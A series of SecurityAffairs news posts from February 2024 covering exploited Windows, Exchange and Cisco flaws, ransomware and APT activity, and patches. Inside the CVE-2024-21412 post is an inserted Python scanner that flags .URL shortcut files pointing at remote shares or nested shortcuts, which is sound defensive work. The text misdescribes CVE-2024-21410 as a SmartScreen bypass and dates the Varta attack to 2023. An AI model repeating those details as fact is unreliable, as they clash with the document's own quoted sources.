
CISA adds Microsoft Windows bugs to its Known Exploited Vulnerabilities catalog

15 February 2024 at 10:04

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds 2 Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2024-21412 Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability
  • CVE-2024-21351 Microsoft Windows SmartScreen Security Feature Bypass Vulnerability

This week, Microsoft released Patch Tuesday security updates for February 2024 that resolved a total of 72 vulnerabilities, including the above vulnerabilities that are actively exploited in the wild.

Below are the details of the two vulnerabilities:

CVE-2024-21412 (CVSS score 8.1) – Internet Shortcut Files Security Feature Bypass Vulnerability. An unauthenticated attacker can trigger the flaw by sending the victim a specially crafted file that is designed to bypass displayed security checks. The attacker has to trick the victims into clicking the file link. The flaw was reported by:

CVE-2024-21351 (CVSS score 7.6) – Windows SmartScreen Security Feature Bypass Vulnerability. An authorized attacker can trigger the flaw to bypass the SmartScreen user experience. The attacker can exploit the vulnerability by sending a malicious file to the user and convincing them to open it.

Trend Micro researchers reported that the flaw CVE-2024-21412 was used in a zero-day attack chain by the APT group Water Hydra.

A new vulnerability discovered by @thezdi was used in a zero-day attack chain by the APT group Water Hydra.

Watch Trend Micro Sr. Threat Researcher @gothburz share his expert insights on CVE-2024-21412. pic.twitter.com/AZasBtG2Ot

— Trend Micro Research (@TrendMicroRSRCH) February 13, 2024

The popular researcher Will Dormann speculates that CVE-2024-21412 results from the partial fix of the vulnerability CVE-2023-36025. The fix for CVE-2023-36025 didn’t consider the case where a .URL file points to a .URL file, Dormann explained.

Ah, so it looks like CVE-2024-21412 is to address a bypass for CVE-2023-36025, which was the fact that remote targets inside of a ZIP didn't get SmartScreen love. The fix for CVE-2023-36025 didn't consider the case where a .URL file points to a .URL file.https://t.co/SLpw0L7mtY pic.twitter.com/x3lskKmBRi

— Will Dormann (@wdormann) February 13, 2024
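A defender-side check for the file pattern Dormann describes, added here as an example and not part of the original post or the tweets: it parses a Windows .URL (InternetShortcut) file and flags targets that are remote (a UNC path or a file:// URL with a host) or that are themselves .url files. The sample files and hosts are constructed.

```python
import configparser
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample .URL (InternetShortcut) files for the demo; none are real samples.
SAMPLES = {
    "benign.url": "[InternetShortcut]\r\nURL=https://example.com/docs/report.pdf\r\n",
    "remote_share.url": "[InternetShortcut]\r\nURL=\\\\203.0.113.10\\share\\doc.pdf\r\n",
    "remote_nested.url": "[InternetShortcut]\r\nURL=file://203.0.113.10/share/inner.url\r\n",
    "local_nested.url": "[InternetShortcut]\r\nURL=file:///C:/Users/Public/inner.url\r\n",
}


@dataclass(frozen=True)
class Verdict:
    target: str        # the URL= value as written in the file
    remote: bool       # target lives on another host (UNC path or file:// with a host)
    nested_url: bool   # target is itself a .url file (the .URL-to-.URL chain)

    @property
    def suspicious(self) -> bool:
        return self.remote or self.nested_url


def parse_internet_shortcut(text: str) -> str:
    """Return the URL= value of an InternetShortcut file, or raise ValueError."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text.lstrip("\ufeff"))   # tolerate a UTF-8 BOM
    except configparser.Error as exc:
        raise ValueError(f"unparseable shortcut file: {exc}") from exc
    if not cp.has_section("InternetShortcut"):
        raise ValueError("not an InternetShortcut file")
    target = cp.get("InternetShortcut", "URL", fallback="").strip()
    if not target:
        raise ValueError("InternetShortcut has no URL= entry")
    return target


def classify_target(target: str) -> Verdict:
    """Flag remote targets and .url-to-.url chains; both are cases the fixes address."""
    lower = target.lower()
    nested = lower.endswith(".url")
    if lower.startswith("\\\\") or lower.startswith("//"):
        remote = True                      # UNC path: \\host\share\...
    else:
        parts = urlparse(target)
        # file:// with a non-empty, non-local host is a network (SMB/WebDAV) fetch
        remote = parts.scheme == "file" and parts.netloc not in ("", "localhost")
    return Verdict(target=target, remote=remote, nested_url=nested)


def scan_shortcut(text: str) -> Verdict:
    return classify_target(parse_internet_shortcut(text))


def scan_all(samples: dict[str, str]) -> dict[str, Verdict]:
    return {name: scan_shortcut(body) for name, body in samples.items()}


if __name__ == "__main__":
    for name, v in scan_all(SAMPLES).items():
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{name:20} remote={v.remote!s:5} nested_url={v.nested_url!s:5} {flag}  {v.target}")
```

Shortcut files extracted from archives or mail attachments can be run through scan_all before they reach a user; a hit on either flag is worth a closer look rather than an automatic block.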

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix this vulnerability by March 5, 2024.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

North Korea-linked actors breached the emails of a Presidential Office member

15 February 2024 at 15:22

The office of South Korean President Yoon Suk Yeol said that North Korea-linked actors breached the personal emails of one of his staff members.

The office of South Korean President Yoon Suk Yeol announced a security incident involving the compromise of personal emails belonging to a member of the presidential staff. The government attributes the security breach to North Korean threat actors. The attackers had access to the personal emails of the staff member ahead of Yoon’s trip to Europe in November 2023.

The office of the South Korean President explained that the compromise of the account occurred due to the staff member utilizing commercial email services for official responsibilities.

At this time it’s unclear which kind of information was exposed, however, Yoon’s office pointed out that threat actors did compromise the overall office’s security system.

“We detected the case in advance of (Yoon’s) visit and took necessary measures,” Yoon’s office said in a statement to reporters, according to the Associated Press. The office said it has been monitoring and defending against “constant” hacking attempts presumed to be related to North Korea but “it’s not that the presidential office’s security system got hacked.”

South Korea is a privileged target of cyber espionage operations carried out by North Korea-linked APT groups.

North Korea-linked APT groups are also known to be focused on attacks against crypto exchange and financial organizations in South Korea.

Recently, a U.N. panel of experts announced an investigation into 58 suspected North Korean cyberattacks between 2017 and 2023 valued at approximately $3 billion.


Pierluigi Paganini

(SecurityAffairs – hacking, North Korea)

A cyberattack halted operations at Varta production plants

15 February 2024 at 18:43

On February 12, 2023, a cyber attack halted operations at five production plants of German battery manufacturer Varta.

On February 13, German battery manufacturer Varta announced that a cyber attack forced the company to shut down IT systems. The attack disrupted operations at five production plants and the administration.

VARTA AG is a leading global manufacturer of batteries with over 4,500 employees worldwide, reporting revenue of €1.2 billion in 2023.

The announcement revealed that the company has temporarily shut down its systems to contain the threat, a circumstance that suggests it was the victim of a ransomware attack.

The company launched an investigation into the incident, with the help of forensics experts, to determine its scope.

“Last night, February 12th 2024, the VARTA Group was the target of a cyber attack on parts of its IT systems. This affects the five production plants and the administration. The IT systems and thus also production were proactively shut down temporarily for security reasons and disconnected from the internet. The IT systems and the extent of the impact are currently being reviewed. The utmost care is being taken to ensure data integrity. The extent of the actual damage cannot be determined at this time. In accordance with the emergency plan for such situations, the necessary precautionary measures were implemented immediately.” reads the statement published by the company. “Additionally, a task force was set up instantly to restore normal operations as quickly as possible and deal with the incident with the support of cyber security experts and data forensics specialists.”

Impacted production plants are in Germany, Romania and Indonesia; on February 14, operations at the plants were still blocked.

“The battery manufacturer’s production continues to stand still after a hacker attack. A spokesman for the company from Ellwangen in Baden-Württemberg told the German Press Agency on Wednesday afternoon upon request. The five production sites, three of them in Germany and one each in Romania and Indonesia, are affected. Likewise the administration.” reported the German website Finanzen.

At this time, no known ransomware group has claimed responsibility for the attack.


Pierluigi Paganini

(SecurityAffairs – hacking, Varta)

US Gov dismantled the Moobot botnet controlled by Russia-linked APT28

15 February 2024 at 19:40

The US authorities dismantled the Moobot botnet, which was controlled by the Russia-linked cyberespionage group APT28.

A court order allowed US authorities to neutralize the Moobot botnet, a network of hundreds of small office/home office (SOHO) routers under the control of the Russia-linked group APT28.

The botnet was used by the Russian state-sponsored hackers to carry out a broad range of attacks.

“A January 2024 court-authorized operation has neutralized a network of hundreds of small office/home office (SOHO) routers that GRU Military Unit 26165, also known as APT28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear, and Sednit, used to conceal and otherwise enable a variety of crimes.” reads the press release published by DoJ. “These crimes included vast spearphishing and similar credential harvesting campaigns against targets of intelligence interest to the Russian government, such as U.S. and foreign governments and military, security, and corporate organizations. In recent months, allegations of Unit 26165 activity of this type has been the subject of a private sector cybersecurity advisory and a Ukrainian government warning.”

The Moobot botnet was composed of hundreds of compromised Ubiquiti Edge OS routers; it was initially created by a known cyber criminal group and later controlled by the Russia-linked APT group.

The Mirai-based Moobot botnet was first documented by Palo Alto Unit 42 researchers in February 2021. In November 2021, it started exploiting a critical command injection flaw (CVE-2021-36260) in the webserver of several Hikvision products. Since September 2022, the Moobot botnet has been spotted targeting vulnerable D-Link routers.

In April 2023, FortiGuard Labs researchers observed a hacking campaign targeting Cacti (CVE-2022-46169) and Realtek (CVE-2021-35394) vulnerabilities to spread ShellBot and Moobot malware.

The court order allowed authorities to use the Moobot malware to copy and delete stolen and malicious data and files from compromised routers. The US government operation blocked access to the routers by Russian cyberspies. The operation reversibly modified the routers’ firewall rules to block remote management access to the devices.

“The Department’s court-authorized operation leveraged the Moobot malware to copy and delete stolen and malicious data and files from compromised routers.” continues the press release. “Additionally, in order to neutralize the GRU’s access to the routers until victims can mitigate the compromise and reassert full control, the operation reversibly modified the routers’ firewall rules to block remote management access to the devices, and during the course of the operation, enabled temporary collection of non-content routing information that would expose GRU attempts to thwart the operation.”

According to court documents, the government extensively tested the operation on the relevant Ubiquiti Edge OS routers. The DoJ pointed out that apart from hindering the GRU’s ability to access the routers, the operation did not affect the routers’ normal functionality or gather legitimate user content information. The court order also allowed the authorities to disconnect the routers from the Moobot network; users can revert the firewall rule changes by performing factory resets of their routers or accessing their routers through the local network.


Pierluigi Paganini

(SecurityAffairs – hacking, Moobot botnet)

Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs

16 February 2024 at 08:05

Russia-linked APT group Turla has been spotted targeting Polish non-governmental organizations (NGO) with a new backdoor dubbed TinyTurla-NG.

Russia-linked cyberespionage group Turla has been spotted using a new backdoor dubbed TinyTurla-NG in attacks aimed at Polish non-governmental organizations.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004, targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

Cisco Talos researchers reported that “TinyTurla-NG” (TTNG) is similar to Turla’s implant TinyTurla.

TinyTurla-NG was spotted in early December 2023; it was employed in attacks targeting NGOs working on improving Polish democracy and supporting Ukraine during the Russian invasion.

“Talos assesses with high confidence that TinyTurla-NG, just like TinyTurla, is a small “last chance” backdoor that is left behind to be used when all other unauthorized access/backdoor mechanisms have failed or been detected on the infected systems.” reads the report published by Cisco Talos.

Talos also discovered previously undetected PowerShell scripts dubbed “TurlaPower-NG” that were designed for data exfiltration. Turla operators used the scripts to exfiltrate keys used to secure the password databases of popular password management software.

The cybersecurity firm identified three different TinyTurla-NG samples and gained access to two of them. This latest campaign began at least on December 18, 2023, and was still active as recently as January 27, 2024. Evidence gathered by the experts suggests that the campaign may have begun as early as November 2023.

Turla operators used compromised WordPress websites as C2 for the TinyTurla-NG backdoor. Threat actors compromised the websites running vulnerable versions of the popular CMS, including 4.4.20, 5.0.21, 5.1.18 and 5.7.2. The attackers uploaded PHP files containing the C2 code consisting of names such as: rss-old[.]php, rss[.]old[.]php or block[.]old[.]php.


Since the beginning of the campaign, the attackers used various C2 servers to host PowerShell scripts and arbitrary commands that could be executed on the victim’s machine.

Like TinyTurla, TinyTurla-NG operates as a service DLL initiated through svchost.exe. The malware uses Windows events for synchronization, with the first primary malware thread initiated in the DLL’s ServiceMain function.

The malware supports the following commands:

  • “changeshell”: This command will instruct the backdoor to switch the current shell being used to execute commands, i.e., from cmd.exe to PowerShell.exe, or vice versa.
  • “changepoint”: This command is used to likely tell the implant to switch to the second C2 URL present in the implant.
  • “get”: Fetch a file specified by the C2 using an HTTP GET request and write it to the specified location on disk.
  • “post”: Exfiltrate a file from the victim to the C2, e.g., post C:\some_file.bin.
  • “killme”: Create a BAT file (see below) with a name based on the current tick count. Then, use the BAT file to delete a file from the disk of the victim machine, e.g., killme <filename>. The BAT file is executed via cmd.exe /c <BAT-file-name>.bat

The report includes indicators of compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – hacking, Turla)

U.S. CISA: hackers breached a state government organization

16 February 2024 at 12:04

U.S. CISA revealed that threat actors breached an unnamed state government organization via an administrator account belonging to a former employee.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed that a threat actor gained access to an unnamed state government organization’s network environment via an administrator account belonging to a former employee.

CISA and the Multi-State Information Sharing & Analysis Center (MS-ISAC) published a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) utilized by a threat actor.

The government experts conducted an incident response assessment of the state government organization after its documents were posted on the dark web. The threat actor compromised network administrator credentials through the account of a former employee, which was used to successfully authenticate to an internal virtual private network (VPN) access point. The attackers then moved laterally and executed various lightweight directory access protocol (LDAP) queries against a domain controller. The government organization also hosts its sensitive data in an Azure environment, which was not accessed by the attackers.

“The logs revealed the threat actor first connected from an unknown virtual machine (VM) to the victim’s on-premises environment via internet protocol (IP) addresses within their internal VPN range. CISA and MS-ISAC assessed that the threat actor connected to the VM through the victim’s VPN with the intent to blend in with legitimate traffic to evade detection.” reads the report published by CISA.

The threat actor likely obtained the employee’s account credentials from a third-party data breach.

The threat actor likely obtained the account credentials of a second user from the virtualized SharePoint server managed by the first user. Neither of the two administrative accounts had multifactor authentication (MFA) enabled.

CISA pointed out that the victim confirmed that the administrator credentials for the second user were stored locally on this server.

Access to the virtualized SharePoint server enabled threat actors to also acquire a separate set of credentials stored on the server, granting administrative privileges to both the on-premises network and Azure Active Directory.

The report includes a lot of interesting details about the threat actor’s activity along with mitigations in accordance with the Cross-Sector Cybersecurity Performance Goals (CPGs) established by CISA and the National Institute of Standards and Technology (NIST), which are recommended to all critical infrastructure entities and network defenders.

CISA did not attribute the attack to a specific threat actor.


Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders

16 February 2024 at 18:48

The U.S. government offers rewards of up to $10 million for information that could lead to the identification or location of ALPHV/Blackcat ransomware gang leaders.

The U.S. Department of State is offering a reward of up to $10 million for information leading to the identification or location of the key figures behind the ALPHV/Blackcat ransomware operation. The US government is also offering a reward of up to $5 million for information leading to the arrest and/or conviction in any country of any individual conspiring to participate in or attempting to participate in ALPHV/Blackcat ransomware attacks.

This additional reward targets the affiliates and initial access brokers that facilitated the group's attacks.

The BlackCat/ALPHV ransomware gang has been active since November 2021; the list of its victims is long and includes industrial explosives manufacturer SOLAR INDUSTRIES INDIA, the US defense contractor NJVC, gas pipeline Creos Luxembourg S.A., the fashion giant Moncler, Swissport, NCR, and Western Digital. The ransom demands of the group range from a few tens of thousands of dollars up to tens of millions of dollars.

On December 19, 2023, the FBI seized the Tor leak site of the AlphV/Blackcat ransomware group and replaced the home page with the announcement of the seizure.

On December 7th, BleepingComputer and other prominent experts reported that the ALPHV gang’s websites went offline.

On December 10th, the primary domain of the group went offline and administrators claimed the problem was caused by a hardware failure. At the same time, rumors circulated that the site was taken offline as a result of law enforcement’s operation. The group always denied this circumstance, but today the domain displayed the following message to the visitors.

The seizure is the result of a joint operation conducted by international law enforcement agencies from the US, Denmark, Germany, UK, Netherlands, Australia, Spain, Austria and Europol.

“This action has been taken in coordination with the United States Attorney’s Office for the Southern District of Florida and the Computer Crime and Intellectual Property Section of the Department of Justice with substantial assistance from Europol and Zentrale Kriminalinspektion Göttingen.” reads the message published by law enforcement on the seized websites.


“The Justice Department announced today a disruption campaign against the Blackcat ransomware group — also known as ALPHV or Noberus — that has targeted the computer networks of more than 1,000 victims and caused harm around the world since its inception, including networks that support U.S. critical infrastructure.” reads the press release published by DoJ.

The ALPHV/Blackcat group was the second most prolific ransomware-as-a-service operation; it amassed hundreds of millions of dollars in ransom payments.

The FBI developed a decryption tool that could allow over 500 victims to recover their systems for free.

“FBI identified ALPHV/Blackcat actors as having compromised over 1,000 victim entities in the United States and elsewhere, including prominent government entities (e.g., municipal governments, defense contractors, and critical infrastructure organizations).” reads the press release. “To date, the FBI has worked with dozens of victims in the United States and internationally to disseminate a decryption tool to restore victim systems and prevent ransom demand payments of approximately $99 million.”

According to the press release published by the U.S. Department of State, ALPHV/Blackcat actors have compromised over 1,000 victim entities in the United States and elsewhere.

People who have information eligible for the reward can access the following Tor website set up by the US Department of State: he5dybnt7sr6cm32xt77pazmtm65flqy6irivtflruqfc5ep7eiodiad.onion


Pierluigi Paganini

(SecurityAffairs – hacking, ALPHV/Blackcat ransomware)

CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog

16 February 2024 at 19:36

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following two vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2020-3259 Cisco ASA and FTD Information Disclosure Vulnerability
  • CVE-2024-21410 Microsoft Exchange Server Privilege Escalation Vulnerability

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The vulnerability CVE-2024-21410 is a bypass vulnerability that can be exploited by an attacker to bypass the SmartScreen user experience and inject code to potentially gain code execution, which could lead to some data exposure, lack of system availability, or both.

“An attacker could target an NTLM client such as Outlook with an NTLM credentials-leaking type vulnerability. The leaked credentials can then be relayed against the Exchange server to gain privileges as the victim client and to perform operations on the Exchange server on the victim’s behalf. For more information about Exchange Server’s support for Extended Protection for Authentication (EPA), please see Configure Windows Extended Protection in Exchange Server.” reads the advisory published by Microsoft.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by March 7, 2024.


Pierluigi Paganini

(SecurityAffairs – Hacking, Known Exploited Vulnerabilities catalog)

CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks

17 February 2024 at 10:45

CISA warns that the Akira Ransomware gang is exploiting the Cisco ASA/FTD vulnerability CVE-2020-3259 (CVSS score: 7.5) in attacks in the wild.

This week the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco ASA and FTD bug, tracked as CVE-2020-3259 (CVSS score: 7.5), to its Known Exploited Vulnerabilities catalog.

The vulnerability CVE-2020-3259 is an information disclosure issue that resides in the web services interface of ASA and FTD. Cisco addressed the flaw in May 2020.

The issue was listed by CISA as known to be used in ransomware campaigns, but the agency did not reveal which ransomware groups are actively exploiting the issue.

In January, researchers from cybersecurity firm Truesec reported that the Akira ransomware group exploited the vulnerability in attacks targeting Cisco ASA and FTD appliances.

“During the past weeks, the Truesec CSIRT team found forensic data indicating that the Akira Ransomware group might be actively exploiting an old Cisco ASA (Adaptive Security Appliance) and FTD (Firepower Threat Defence) vulnerability tracked as CVE-2020-3259.” reads the report published by Truesec.

An attacker can trigger the vulnerability to extract sensitive data from the memory of the affected devices, including usernames and passwords.

The researchers analyzed eight incidents involving the Akira ransomware and confirmed that the flaw in Cisco Anyconnect SSL VPN was the entry point in at least six of the compromised devices.

“When the vulnerability was made public in 2020, no known public exploits were available. However, there are now indications that this vulnerability might be actively exploited.” continues the report.

The Akira ransomware has been active since March 2023; the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. Like other ransomware gangs, the group has developed a Linux encryptor to target VMware ESXi servers.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts also recommend that private organizations review the catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix the vulnerability CVE-2020-3259 by March 7, 2024.


Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes

17 February 2024 at 16:38

A Ukrainian national pleaded guilty to his role in the Zeus and IcedID operations, which caused tens of millions of dollars in losses.

Ukrainian national Vyacheslav Igorevich Penchukov has pleaded guilty to his key roles in the Zeus and IcedID malware operations.

“Vyacheslav Igorevich Penchukov was a leader of two prolific malware groups that infected thousands of computers with malicious software. These criminal groups stole millions of dollars from their victims and even attacked a major hospital with ransomware, leaving it unable to provide critical care to patients for over two weeks,” said Acting Assistant Attorney General Nicole M. Argentieri of the Justice Department’s Criminal Division. “Before his arrest and extradition to the United States, the defendant was a fugitive on the FBI’s most wanted list for nearly a decade. Today’s guilty pleas should serve as a clear warning: the Justice Department will never stop in its pursuit of cybercriminals.”

In October 2022, Swiss police arrested Penchukov, also known as Tank, one of the leaders of the JabberZeus cybercrime group, in Geneva.

The man was extradited to the United States in 2023; he had been included in the FBI’s “Most Wanted” list and had been sought for 10 years.


In 2012, the Ukrainian national Vyacheslav Igorevich Penchukov was accused of being a member of a cybercrime gang known as the JabberZeus crew. JabberZeus was a small cybercriminal ring that targeted SMBs with a custom-made version of the Zeus banking trojan. At the time, DoJ accused Penchukov of coordinating the exchange of stolen banking credentials and money mules and of receiving alerts once a bank account had been compromised.

The popular investigator Brian Krebs reported that Gary Warner, director of research in computer forensics at the University of Alabama at Birmingham, noted in 2014 that Tank told co-conspirators in a JabberZeus chat on July 22, 2009 that his daughter, Miloslava, had been born, and told them Miloslava's birth weight.

Warner explained that Tank was identified by searching Ukrainian birth records for the only girl named Miloslava born on that day with a specific birth weight.

Krebs pointed out that Penchukov was able to evade prosecution by Ukrainian authorities for many years due to his political connections. The late son of former Ukrainian President Victor Yanukovych would serve as godfather to Tank’s daughter Miloslava.

Two other members of the gang, Yevhen Kulibaba and Yuriy Konovalenko, were arrested in 2014 and pleaded guilty. Both were sentenced to two years and ten months of incarceration in May 2015 followed by a supervised release of 1 year.

Since May 2019, Penchukov had a prominent role in the Zeus operation. From at least November 2018 through February 2021, Penchukov helped lead a conspiracy that infected victim computers with IcedID or Bokbot.

Penchukov faces up to 20 years in prison for each count; he is scheduled to be sentenced on May 9.


Pierluigi Paganini

(SecurityAffairs – hacking, IcedID Malware)

Security Affairs newsletter Round 459 by Pierluigi Paganini – INTERNATIONAL EDITION

18 February 2024 at 14:21

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box.

Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press.

Ukrainian national faces up to 20 years in prison for his role in Zeus, IcedID malware schemes
CISA: Cisco ASA/FTD bug CVE-2020-3259 exploited in ransomware attacks
CISA adds Microsoft Exchange and Cisco ASA and FTD bugs to its Known Exploited Vulnerabilities catalog
US gov offers a reward of up to $10M for info on ALPHV/Blackcat gang leaders
U.S. CISA: hackers breached a state government organization
Russia-linked Turla APT uses new TinyTurla-NG backdoor to spy on Polish NGOs
US Gov dismantled the Moobot botnet controlled by Russia-linked APT28
A cyberattack halted operations at Varta production plants
North Korea-linked actors breached the emails of a Presidential Office member
Nation-state actors are using AI services and LLMs for cyberattacks
Abusing the Ubuntu ‘command-not-found’ utility to install malicious packages
Zoom fixed critical flaw CVE-2024-24691 in Windows software
Adobe Patch Tuesday fixed critical vulnerabilities in Magento, Acrobat and Reader
Microsoft Patch Tuesday for February 2024 fixed 2 actively exploited 0-days
A ransomware attack took 100 Romanian hospitals down
Bank of America customer data compromised after a third-party services provider data breach
Ransomfeed – Third Quarter Report 2023 is out!
Global Malicious Activity Targeting Elections is Skyrocketing
Researchers released a free decryption tool for the Rhysida Ransomware
Residential Proxies vs. Datacenter Proxies: Choosing the Right Option
CISA adds Roundcube Webmail Persistent XSS bug to its Known Exploited Vulnerabilities catalog
Canada Gov plans to ban the Flipper Zero to curb car thefts
ExpressVPN leaked DNS requests due to a bug in the split tunneling feature
9 Possible Ways Hackers Can Use Public Wi-Fi to Steal Your Sensitive Data
US Feds arrested two men involved in the Warzone RAT operation
Raspberry Robin spotted using two new 1-day LPE exploits

Cybercrime

International Cybercrime Malware Service Dismantled by Federal Authorities: Key Malware Sales and Support Actors in Malta and Nigeria Charged in Federal Indictments

As-a-Service tools empower criminals with limited tech skills

Ransomware Attack Takes 100 Hospitals Offline

Reward for Information: ALPHV/Blackcat Ransomware as a Service

Foreign National Pleads Guilty to Role in Cybercrime Schemes Involving Tens of Millions of Dollars in Losses

Malware

RASPBERRY ROBIN KEEPS RIDING THE WAVE OF ENDLESS 1-DAYS

A Method for Decrypting Data Infected with Rhysida Ransomware

Bypassing EDRs With EDR-Preloading

Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU)

Face Off

Hacking

Snap Trap: The Hidden Dangers Within Ubuntu’s Package Suggestion System

Disrupting malicious uses of AI by state-affiliated threat actors

CISA and MS-ISAC Release Advisory on Compromised Account Used to Access State Government Organization

Ivanti Pulse Secure Found Using 11-Year-Old Linux Version and Outdated Libraries

Intelligence and Information Warfare

Global Malicious Activity Targeting Elections Is Skyrocketing

Staying ahead of threat actors in the age of AI

US needs to take China’s cyber-threat to US infrastructure more seriously

South Korea says presumed North Korean hackers breached personal emails of presidential staffer

TinyTurla Next Generation – Turla APT spies on Polish NGOs

Cybersecurity

Building a Data Fortress: Data Security and Privacy in the Age of Generative AI and LLMs

Package Theft Statistics

After a tip, ExpressVPN acts swiftly to protect customers

Canada to ban the Flipper Zero to stop surge in car thefts

I’m a cyber expert, these are the five things you need to do to ‘digitally break up’ with someone in the age of login sharing

THE FEBRUARY 2024 SECURITY UPDATE REVIEW

Fertility tracker Glow fixes bug that exposed users’ personal data

European Court of Human Rights declares backdoored encryption is illegal

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

ESET fixed high-severity local privilege escalation bug in Windows products

18 February 2024 at 15:38

Cybersecurity firm ESET has addressed a high-severity elevation of privilege vulnerability in its Windows security solution.

ESET addressed a high-severity vulnerability, tracked as CVE-2024-0353 (CVSS score 7.8), in its Windows products.

The vulnerability is a local privilege escalation issue that was submitted to the company by the Zero Day Initiative (ZDI). According to the advisory, an attacker can misuse ESET’s file operations, as performed by the Real-time file system protection, to delete files without having the proper permission.

“The vulnerability in file operations handling, performed by the Real-time file system protection feature on the Windows operating system, potentially allowed an attacker with an ability to execute low-privileged code on the target system to delete arbitrary files as NT AUTHORITY\SYSTEM, escalating their privileges.” reads the advisory.

ESET is not aware of attacks in the wild exploiting this vulnerability.

Below is the list of impacted programs and versions:

  • ESET NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate 16.2.15.0 and earlier
  • ESET Endpoint Antivirus for Windows and Endpoint Security for Windows 10.1.2058.0, 10.0.2049.0, 9.1.2066.0, 8.1.2052.0 and earlier from the respective version family
  • ESET Server Security for Windows Server (formerly File Security for Microsoft Windows Server) 10.0.12014.0, 9.0.12018.0, 8.0.12015.0, 7.3.12011.0 and earlier from the respective version family
  • ESET Mail Security for Microsoft Exchange Server 10.1.10010.0, 10.0.10017.0, 9.0.10011.0, 8.0.10022.0, 7.3.10014.0 and earlier from the respective version family
  • ESET Mail Security for IBM Domino 10.0.14006.0, 9.0.14007.0, 8.0.14010.0, 7.3.14004.0 and earlier from the respective version family
  • ESET Security for Microsoft SharePoint Server 10.0.15004.0, 9.0.15005.0, 8.0.15011.0, 7.3.15004.0 and earlier from the respective version family
  • ESET File Security for Microsoft Azure (all versions)

The cybersecurity firm has released patches to address the issues in NOD32 Antivirus, Internet Security, Smart Security Premium, Security Ultimate, Endpoint Antivirus and Endpoint Security for Windows, Server Security for Windows Server, Mail Security for Exchange Server and IBM Domino, Security for SharePoint Server, File Security for Microsoft Azure.

The security firm hasn’t provided security patches for products that reached their end-of-life (EoL) status.

The company recommended customers patch their products as soon as possible.

Vulnerabilities in security solutions are very dangerous because these issues are difficult to detect and because these software solutions run with high privileges.

In December 2023, the cybersecurity firm addressed a vulnerability (CVE-2023-5594, CVSS score 7.5) in the Secure Traffic Scanning Feature, preventing potential exploitation that could lead web browsers to trust websites using certificates signed with outdated and insecure algorithms.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, privilege escalation)

SolarWinds addressed critical RCEs in Access Rights Manager (ARM)

19 February 2024 at 07:48

SolarWinds addressed three critical vulnerabilities in its Access Rights Manager (ARM) solution, including two RCE bugs.

SolarWinds has fixed several Remote Code Execution (RCE) vulnerabilities in its Access Rights Manager (ARM) solution.

Access Rights Manager (ARM) is a software solution designed to assist organizations in managing and monitoring access rights and permissions within their IT infrastructure. This type of tool is crucial for maintaining security, compliance, and efficient administration of user access to various resources, systems, and data.

Below is the list of flaws addressed by the company:

ADVISORY | CVE ID | SEVERITY | RELEASE DATE | LAST UPDATE | FIXED VERSION
SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability | CVE-2023-40057 | 9.0 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
SolarWinds Access Rights Manager (ARM) Directory Traversal Remote Code Execution Vulnerability | CVE-2024-23476 | 9.6 Critical | 02/06/2024 | 02/06/2024 | SolarWinds Access Rights Manager (ARM) 2023.2.3
